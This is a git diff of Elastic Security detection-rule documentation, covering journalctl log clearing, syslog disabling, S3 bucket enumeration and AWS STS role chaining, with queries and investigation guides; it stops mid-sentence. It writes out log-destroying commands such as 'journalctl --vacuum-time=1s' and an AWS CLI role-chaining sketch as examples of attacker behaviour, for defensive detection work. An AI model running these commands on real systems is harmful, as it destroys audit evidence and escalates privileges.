include::rule-details/azure-privilege-identity-management-role-modified.asciidoc[] +include::rule-details/azure-rbac-built-in-administrator-roles-assigned.asciidoc[] include::rule-details/azure-resource-group-deletion.asciidoc[] +include::rule-details/azure-storage-account-blob-public-access-enabled.asciidoc[] include::rule-details/azure-storage-account-key-regenerated.asciidoc[] +include::rule-details/azure-storage-account-keys-accessed-by-privileged-user.asciidoc[] include::rule-details/bpf-filter-applied-using-tc.asciidoc[] include::rule-details/backup-deletion-with-wbadmin.asciidoc[] include::rule-details/base16-or-base32-encoding-decoding-activity.asciidoc[] @@ -270,6 +273,7 @@ include::rule-details/creation-or-modification-of-domain-backup-dpapi-private-ke include::rule-details/creation-or-modification-of-pluggable-authentication-module-or-configuration.asciidoc[] include::rule-details/creation-or-modification-of-root-certificate.asciidoc[] include::rule-details/creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc[] +include::rule-details/credential-access-via-trufflehog-execution.asciidoc[] include::rule-details/credential-acquisition-via-registry-hive-dumping.asciidoc[] include::rule-details/credential-dumping-detected-elastic-endgame.asciidoc[] include::rule-details/credential-dumping-prevented-elastic-endgame.asciidoc[] @@ -279,6 +283,7 @@ include::rule-details/cron-job-created-or-modified.asciidoc[] include::rule-details/crowdstrike-external-alerts.asciidoc[] include::rule-details/cupsd-or-foomatic-rip-shell-execution.asciidoc[] include::rule-details/curl-socks-proxy-activity-from-unusual-parent.asciidoc[] +include::rule-details/curl-or-wget-spawned-via-node-js.asciidoc[] include::rule-details/cyberark-privileged-access-security-error.asciidoc[] include::rule-details/cyberark-privileged-access-security-recommended-monitor.asciidoc[] include::rule-details/d-bus-service-created.asciidoc[] @@ -327,7 +332,9 @@ include::rule-details/enable-host-network-discovery-via-netsh.asciidoc[] include::rule-details/encoded-executable-stored-in-the-registry.asciidoc[] include::rule-details/encrypting-files-with-winrar-or-7z.asciidoc[] include::rule-details/endpoint-security-elastic-defend.asciidoc[] +include::rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc[] include::rule-details/entra-id-device-code-auth-with-broker-client.asciidoc[] +include::rule-details/entra-id-global-administrator-role-assigned.asciidoc[] include::rule-details/entra-id-mfa-disabled-for-user.asciidoc[] include::rule-details/entra-id-protection-risk-detection-sign-in-risk.asciidoc[] include::rule-details/entra-id-protection-risk-detection-user-risk.asciidoc[] @@ -443,6 +450,7 @@ include::rule-details/git-hook-created-or-modified.asciidoc[] include::rule-details/git-hook-egress-network-connection.asciidoc[] include::rule-details/git-repository-or-file-download-to-suspicious-directory.asciidoc[] include::rule-details/github-app-deleted.asciidoc[] +include::rule-details/github-authentication-token-access-via-node-js.asciidoc[] include::rule-details/github-owner-role-granted-to-user.asciidoc[] include::rule-details/github-pat-access-revoked.asciidoc[] include::rule-details/github-protected-branch-settings-changed.asciidoc[] @@ -637,6 +645,7 @@ include::rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-ap include::rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc[] 
include::rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc[] include::rule-details/microsoft-entra-id-protection-risk-detections.asciidoc[] +include::rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc[] include::rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc[] include::rule-details/microsoft-entra-id-service-principal-created.asciidoc[] include::rule-details/microsoft-entra-id-service-principal-credentials-added-by-rare-user.asciidoc[] @@ -718,6 +727,7 @@ include::rule-details/new-okta-authentication-behavior-detected.asciidoc[] include::rule-details/new-okta-identity-provider-idp-added-by-admin.asciidoc[] include::rule-details/new-user-added-to-github-organization.asciidoc[] include::rule-details/new-or-modified-federation-domain.asciidoc[] +include::rule-details/node-js-pre-or-post-install-script-execution.asciidoc[] include::rule-details/nping-process-activity.asciidoc[] include::rule-details/nullsessionpipe-registry-modification.asciidoc[] include::rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc[] @@ -776,7 +786,10 @@ include::rule-details/potential-application-shimming-via-sdbinst.asciidoc[] include::rule-details/potential-azure-openai-model-theft.asciidoc[] include::rule-details/potential-backdoor-execution-through-pam-exec.asciidoc[] include::rule-details/potential-buffer-overflow-attack-detected.asciidoc[] +include::rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc[] +include::rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc[] include::rule-details/potential-cve-2025-33053-exploitation.asciidoc[] +include::rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc[] include::rule-details/potential-chroot-container-escape-via-mount.asciidoc[] include::rule-details/potential-code-execution-via-postgresql.asciidoc[] include::rule-details/potential-command-and-control-via-internet-explorer.asciidoc[] @@ -916,7 +929,7 @@ include::rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc[] include::rule-details/potential-protocol-tunneling-via-earthworm.asciidoc[] include::rule-details/potential-pspy-process-monitoring-detected.asciidoc[] include::rule-details/potential-remcos-trojan-execution.asciidoc[] -include::rule-details/potential-ransomware-behavior-high-count-of-readme-files-by-system.asciidoc[] +include::rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc[] include::rule-details/potential-ransomware-note-file-dropped-via-smb.asciidoc[] include::rule-details/potential-remote-code-execution-via-web-server.asciidoc[] include::rule-details/potential-remote-credential-access-via-registry.asciidoc[] @@ -1255,6 +1268,7 @@ include::rule-details/suspicious-renaming-of-esxi-files.asciidoc[] include::rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc[] include::rule-details/suspicious-screenconnect-client-child-process.asciidoc[] include::rule-details/suspicious-script-object-execution.asciidoc[] +include::rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc[] include::rule-details/suspicious-service-was-installed-in-the-system.asciidoc[] include::rule-details/suspicious-solarwinds-child-process.asciidoc[] include::rule-details/suspicious-startup-shell-folder-modification.asciidoc[] diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc 
b/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc new file mode 100644 index 0000000000..cec563cc8a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-clear-logs-via-journalctl.asciidoc @@ -0,0 +1,165 @@ +[[attempt-to-clear-logs-via-journalctl]] +=== Attempt to Clear Logs via Journalctl + +This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Clear Logs via Journalctl* + + +This detection flags attempts to purge systemd journal logs by invoking journalctl with vacuum options, which attackers use to erase evidence and impede investigations. A common pattern is a compromised user escalating to root and immediately running sudo journalctl --vacuum-time=1s or --vacuum-size=1M, sometimes via a script or cron job, to rapidly truncate the journal across all boots and hide prior execution traces. + + +*Possible investigation steps* + + +- Enrich with user/UID, effective privileges, parent and command-line, session/TTY, and origin (SSH IP or local), and determine if execution came from a scheduled job (cron/systemd timer) or a script. +- Quantify destructiveness by extracting the exact vacuum parameter value(s) and immediately checking journal state (journalctl --disk-usage and --list-boots) and /var/log/journal size/mtime to see how much history was removed. +- Inspect configuration and persistence paths for intentional log suppression, including recent changes in /etc/systemd/journald.conf (Storage=volatile, SystemMaxUse, SystemMaxFileSize, MaxRetentionSec) and any new systemd units or scripts invoking journalctl vacuum. +- Correlate the vacuum timestamp with preceding activity to identify what might be concealed (privilege escalation, new accounts, sudoers edits, suspicious binaries), using auditd/EDR telemetry and shell history to rebuild the timeline. 
+- Verify remote log forwarding and SIEM ingestion for this host, compare gaps around the vacuum time, and recover pre-vacuum events from central storage to assess impact and intent. + + +*False positive analysis* + + +- A sysadmin or maintenance script ran journalctl --vacuum-time or --vacuum-size to reclaim space on a host under log disk pressure, which should correlate with low-free-space alerts, approved retention policy, and a scheduled systemd timer or cron job. +- OS provisioning or image-preparation steps vacuumed the journal with journalctl --vacuum-files to sanitize logs before snapshotting, typically a one-time root action occurring near installation and matching documented build procedures. + + +*Response and remediation* + + +- Immediately kill any active journalctl vacuum invocation (e.g., pkill -x journalctl), lock or remove sudo for the initiating user, and network-quarantine the host to prevent further tampering. +- Remove persistence by disabling systemd units/timers and cron jobs that call "journalctl --vacuum-*", inspecting /etc/systemd/system/* for ExecStart=journalctl vacuum and /etc/crontab, /etc/cron.*, and user crontabs, then deleting the offending scripts. +- Recover logging by setting Storage=persistent and policy-compliant SystemMaxUse/SystemMaxFileSize/MaxRetentionSec in /etc/systemd/journald.conf, restarting systemd-journald, and backfilling missing events from central log archives. +- Harden by enabling remote forwarding (ForwardToSyslog=yes and rsyslog/syslog-ng to SIEM), adding auditd rules to alert on "journalctl --vacuum-*", and tightening sudoers to require MFA and record command I/O for journalctl on critical hosts. +- Preserve evidence by archiving remaining /var/log/journal entries, journald.conf and its mtime, modified unit files under /etc/systemd/system, and shell/auth logs, and capture a disk snapshot before making further changes. +- Escalate to incident response if root executed "journalctl --vacuum-time/size/files" outside a documented maintenance window, if Storage=volatile was set or retention reduced below policy, or if the same actor performed vacuums on multiple hosts within 24 hours. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. 
+- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "journalctl" and process.args like ("--vacuum-time=*", "--vacuum-size=*", "--vacuum-files=*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc index c414f723a4..6b160fb4d0 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc @@ -39,7 +39,7 @@ Adversaries may attempt to disable the syslog service in an attempt to an attemp * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -159,7 +159,10 @@ process where host.os.type == "linux" and event.action in ("exec", "exec_event", (process.name == "chkconfig" and process.args == "off") or (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) ) and process.args in ("syslog", "rsyslog", "syslog-ng", "syslog.service", "rsyslog.service", "syslog-ng.service") and -not process.parent.name == "rsyslog-rotate" +not ( + process.parent.name == "rsyslog-rotate" or + process.args == "HUP" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc index ab98c16c40..44aa3e2bab 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-enumeration-or-brute-force.asciidoc @@ -1,11 +1,13 @@ [[aws-s3-bucket-enumeration-or-brute-force]] === AWS S3 Bucket Enumeration or Brute Force -Identifies a high number 
of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery. +Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. -*Rule type*: esql +*Rule type*: threshold -*Rule indices*: None +*Rule indices*: + +* logs-aws.cloudtrail-* *Severity*: low @@ -20,7 +22,7 @@ Identifies a high number of failed S3 operations from a single source and accoun *References*: * https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 -* https://docs.aws.amazon.com/cli/latest/reference/s3api/ +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html *Tags*: @@ -31,8 +33,10 @@ Identifies a high number of failed S3 operations from a single source and accoun * Resources: Investigation Guide * Use Case: Log Auditing * Tactic: Impact +* Tactic: Discovery +* Tactic: Collection -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -48,61 +52,64 @@ Identifies a high number of failed S3 operations from a single source and accoun *Triage and analysis* +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. -*Investigating AWS S3 Bucket Enumeration or Brute Force* +*Investigating AWS S3 Bucket Enumeration or Brute Force* -AWS S3 buckets can be be brute forced to cause financial impact against the resource owner. What makes this even riskier is that even private, locked down buckets can still trigger a potential cost, even with an "Access Denied", while also being accessible from unauthenticated, anonymous accounts. This also appears to work on several or all https://docs.aws.amazon.com/cli/latest/reference/s3api/[operations] (GET, PUT, list-objects, etc.). Additionally, buckets are trivially discoverable by default as long as the bucket name is known, making it vulnerable to enumeration for discovery. -Attackers may attempt to enumerate names until a valid bucket is discovered and then pivot to cause financial impact, enumerate for more information, or brute force in other ways to attempt to exfil data. +This rule detects when many failed S3 operations (HTTP 403 AccessDenied) hit a single bucket from a single source address in a short window. This can indicate bucket name enumeration, object/key guessing, or brute-force style traffic intended to drive cost or probe for misconfigurations. 403 requests from outside the bucket owner’s account/organization are not billed, but 4XX from inside the owner’s account/org can still incur charges. Prioritize confirming who is making the calls and where they originate. *Possible investigation steps* -- Examine the history of the operation requests from the same `source.address` and `cloud.account.id` to determine if there is other suspicious activity. -- Review similar requests and look at the `user.agent` info to ascertain the source of the requests (though do not overly rely on this since it is controlled by the requestor). 
-- Review other requests to the same `aws.s3.object.key` as well as other `aws.s3.object.key` accessed by the same `cloud.account.id` or `source.address`. -- Investigate other alerts associated with the user account during the past 48 hours. -- Validate the activity is not related to planned patches, updates, or network administrator activity. -- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred. - - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets. -- Considering the source IP address and geolocation of the user who issued the command: - - Do they look normal for the calling user? - - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control? - - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance? -- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day? -- Contact the account owner and confirm whether they are aware of this activity if suspicious. -- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. +- **Investigate in Timeline.** Investigate the alert in timeline (Take action -> Investigate in timeline) to retrieve and review all of the raw CloudTrail events that contributed to the threshold alert. Threshold alerts only display the grouped fields; Timeline provides a way to see individual event details such as request parameters, full error messages, and additional user context. +- **Confirm entity & target.** Note the rule’s threshold and window. Identify the target bucket (`tls.client.server_name`) and the source (`source.address`). Verify the caller identity details via any available `aws.cloudtrail.user_identity` fields. +- **Actor & session context.** In CloudTrail events, pivot 15–30 minutes around the spike for the same `source.address` or principal. Determine if the source is: + - **External** to your account/organization (recon/cost DDoS risk is lower for you due to 2024 billing change). + - **Internal** (same account/org)—higher cost risk and possible misuse of internal automation. +- **Bucket posture snapshot.** Record S3 Block Public Access, Bucket Policy, ACLs, and whether Versioning/Object Lock are enabled. Capture any recent `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, or lifecycle changes. +- **Blast radius.** Check for similar spikes to other buckets/regions, or parallel spikes from the same source. Review any GuardDuty S3 findings and AWS Config drift related to the bucket or principal. +- **Business context.** Contact the bucket/app owner. Validate whether a migration, scanner, or broken job could legitimately cause bursts. *False positive analysis* -- Verify the `source.address` and `cloud.account.id` - there are some valid operations from within AWS directly that can cause failures and false positives. Additionally, failed automation can also caeuse false positives, but should be identifiable by reviewing the `source.address` and `cloud.account.id`. 
+- **Expected jobs / broken automation.** Data movers, posture scanners, or failed credentials can generate 403 storms. Validate with `userAgent`, ARNs, change windows, and environment (dev/stage vs prod). +- **External probing.** Internet-origin enumeration often looks like uniform 403s from transient or cloud-provider IPs and typically has no business impact and no billing if outside your account/org. Tune thresholds or allowlist known scanners if appropriate. *Response and remediation* -- Initiate the incident response process based on the outcome of the triage. -- Disable or limit the account during the investigation and response. -- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: - - Identify the account role in the cloud environment. - - Assess the criticality of affected services and servers. - - Work with your IT team to identify and minimize the impact on users. - - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. - - Identify any regulatory or legal ramifications related to this activity. -- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. -- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. -- Consider enabling multi-factor authentication for users. -- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed. -- Implement security best practices https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[outlined] by AWS. -- Take the actions needed to return affected systems, data, or services to their normal operational levels. -- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector. -- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). -- Check for PutBucketPolicy event actions as well to see if they have been tampered with. While we monitor for denied, a single successful action to add a backdoor into the bucket via policy updates (however they got permissions) may be critical to identify during TDIR. +**1. Immediate, low-risk actions** +- **Preserve evidence.** Export CloudTrail records (±30 minutes) for the bucket and source address into an evidence bucket with restricted access. +- **Notify owners.** Inform the bucket/application owner and security lead; confirm any maintenance windows. + +**2. Containment options** +- **External-origin spikes:** Verify Block Public Access is enforced and bucket policies are locked down. Optionally apply a temporary deny-all bucket policy allowing only IR/admin roles while scoping. +- **Internal-origin spikes:** Identify the principal. Rotate access keys for IAM users, or restrict involved roles (temporary deny/SCP, remove risky policies). Pause broken jobs/pipelines until validated. + +**3. Scope & hunting** +- Review Timeline and CloudTrail for related events: `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, lifecycle changes, unusual `PutObject`/`DeleteObject` volumes, or cross-account access. 
+- Check GuardDuty S3 and Config drift findings for signs of tampering or lateral movement. + +**4. Recovery & hardening** +- If data impact suspected: with Versioning, restore known-good versions; otherwise, recover from backups/replicas. +- Enable Versioning on critical buckets going forward; evaluate Object Lock legal hold if enabled. +- Ensure Block Public Access, least-privilege IAM policies, CloudTrail data events for S3, and GuardDuty protections are consistently enforced. + + +*Additional information* + +- https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html[AWS S3 billing for error responses]: see latest AWS docs on which error codes are billed. +- https://aws.amazon.com/about-aws/whats-new/2024/05/amazon-s3-no-charge-http-error-codes/[AWS announcement (Aug 2024)]: 403s from outside the account/org are not billed. +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned template for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and bucket-level abuse. ==== Rule query @@ -110,30 +117,10 @@ Attackers may attempt to enumerate names until a valid bucket is discovered and [source, js] ---------------------------------- -from logs-aws.cloudtrail* - -| where - event.provider == "s3.amazonaws.com" - and aws.cloudtrail.error_code == "AccessDenied" - and tls.client.server_name is not null - and cloud.account.id is not null - -// keep only relevant ECS fields -| keep - tls.client.server_name, - source.address, - cloud.account.id - -// count access denied requests per server_name, source, and account -| stats - Esql.event_count = count(*) - by - tls.client.server_name, - source.address, - cloud.account.id - -// Threshold: more than 40 denied requests -| where Esql.event_count > 40 + event.dataset: "aws.cloudtrail" and + event.provider : "s3.amazonaws.com" and + aws.cloudtrail.error_code : "AccessDenied" and + tls.client.server_name : * ---------------------------------- @@ -152,9 +139,9 @@ from logs-aws.cloudtrail* ** ID: TA0007 ** Reference URL: https://attack.mitre.org/tactics/TA0007/ * Technique: -** Name: Cloud Infrastructure Discovery -** ID: T1580 -** Reference URL: https://attack.mitre.org/techniques/T1580/ +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ * Tactic: ** Name: Collection ** ID: TA0009 diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc index 646e012586..167c743a00 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc @@ -34,7 +34,7 @@ This rule detects when a JavaScript file is uploaded or accessed in an S3 static * Use Case: Cloud Threat Detection * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -115,7 +115,7 @@ from logs-aws.cloudtrail* metadata _id, _version, _index "%{{?bucket.name.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_name}, %{?host.key}=%{Esql_priv.aws_cloudtrail_request_parameters_host}, %{?bucket.object.location.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_object_location}}" // Extract file name portion from full object 
path -| dissect Esql.aws_cloudtrail_request_parameters_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" +| dissect Esql.aws_cloudtrail_request_parameters_bucket_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" // Match on JavaScript files | where ends_with(Esql.aws_cloudtrail_request_parameters_object_key, ".js") diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc index a8f1f3d67b..04dee9d385 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc @@ -1,11 +1,14 @@ [[aws-sts-role-chaining]] === AWS STS Role Chaining -Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This rule looks for role chaining activity happening within a single account, to eliminate false positives produced by common cross-account behavior. +Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this is a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurrence of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). -*Rule type*: esql +*Rule type*: new_terms -*Rule indices*: None +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* *Severity*: medium @@ -35,7 +38,7 @@ Identifies role chaining activity. Role chaining is when you use one assumed rol * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -58,40 +61,57 @@ Identifies role chaining activity. Role chaining is when you use one assumed rol *Investigating AWS STS Role Chaining* -AWS Security Token Service (STS) allows temporary, limited-privilege credentials for AWS resources. Role chaining involves using one temporary role to assume another, potentially escalating privileges. Adversaries exploit this by gaining elevated access or persistence. The detection rule identifies such activity by monitoring specific API calls and access patterns within a single account, flagging potential misuse. +Role chaining occurs when a role assumed with temporary credentials (`AssumeRole`) is used to assume another role. While supported by AWS, chaining can increase the risk of privilege escalation (if the second role grants broader permissions) and persistence (since each chained AssumeRole refreshes the session with up to a 1-hour duration). This new terms rule triggers on the first observed combination of one role (`aws.cloudtrail.user_identity.session_context.session_issuer.arn`) assuming another (`aws.cloudtrail.resources.arn`).
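+For orientation, the chained pattern the rule looks for can be reproduced from the AWS CLI roughly as follows. This is a minimal sketch for familiarization only; the account ID, role names, session names, and credential values are hypothetical placeholders rather than values taken from any real environment.
+
+[source, sh]
+----------------------------------
+# Sketch only: account ID, role names, and session names are hypothetical.
+# Step 1: assume the first role with existing credentials.
+aws sts assume-role \
+  --role-arn arn:aws:iam::111111111111:role/FirstRole \
+  --role-session-name first-session
+
+# Step 2: export the temporary credentials returned above (the access key ID
+# of a temporary session begins with "ASIA").
+export AWS_ACCESS_KEY_ID="ASIA-placeholder"
+export AWS_SECRET_ACCESS_KEY="placeholder"
+export AWS_SESSION_TOKEN="placeholder"
+
+# Step 3: the chained call. This second AssumeRole is issued by an already
+# assumed role, which is the pattern the rule keys on.
+aws sts assume-role \
+  --role-arn arn:aws:iam::111111111111:role/SecondRole \
+  --role-session-name chained-session
+----------------------------------
+
+In CloudTrail, the second call is recorded as an `AssumeRole` event whose caller identity type is `AssumedRole`, which corresponds to the `aws.cloudtrail.user_identity.type : "AssumedRole"` condition in the updated rule query below.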
*Possible investigation steps* -- Review the AWS CloudTrail logs to identify the source of the AssumeRole API call by examining the aws.cloudtrail.user_identity.arn field to determine which user or service initiated the role chaining. -- Check the cloud.region field to understand the geographical context of the activity and assess if it aligns with expected operational regions for your organization. -- Investigate the aws.cloudtrail.resources.account_id and aws.cloudtrail.recipient_account_id fields to confirm that the role chaining activity occurred within the same account, as cross-account role chaining is not flagged by this rule. -- Analyze the aws.cloudtrail.user_identity.access_key_id to verify that the access key used is a temporary token starting with "ASIA", indicating the use of temporary credentials. -- Assess the permissions associated with the roles involved in the chaining to determine if the subsequent role provides elevated privileges that could be exploited for privilege escalation or persistence. -- Correlate the timing of the AssumeRole events with other security events or alerts to identify any suspicious patterns or activities that may indicate malicious intent. +- **Review Alert Context**: Investigate the alert, focusing on `aws.cloudtrail.user_identity.session_context.session_issuer.arn` (the calling role) and `aws.cloudtrail.resources.arn` (the target role). +- **Determine scope and intent.** Check `aws.cloudtrail.recipient_account_id` and `aws.cloudtrail.resources.account_id` fields to identify whether the chaining is Intra-account (within the same AWS account) or Cross-account (from another AWS account). +- **Check role privileges.** Compare policies of the calling and target roles. Determine if chaining increases permissions (for example, access to S3 data, IAM modifications, or admin privileges). +- **Correlate with other activity.** Look for related alerts or CloudTrail activity within ±30 minutes: policy changes, unusual S3 access, or use of sensitive APIs. Use `aws.cloudtrail.user_identity.arn` to track behavior from the same role session, use `aws.cloudtrail.user_identity.session_context.session_issuer.arn` to track broader behavior from the role itself. +- **Validate legitimacy.** Contact the account or service owner to confirm if the chaining was expected (for example, automation pipelines or federated access flows). +- **Geography & source.** Review `cloud.region`, `source.address`, and other `geo` fields to assess if the activity originates from expected regions or network ranges. *False positive analysis* -- Cross-account role assumptions are common in many AWS environments and can generate false positives. To mitigate this, 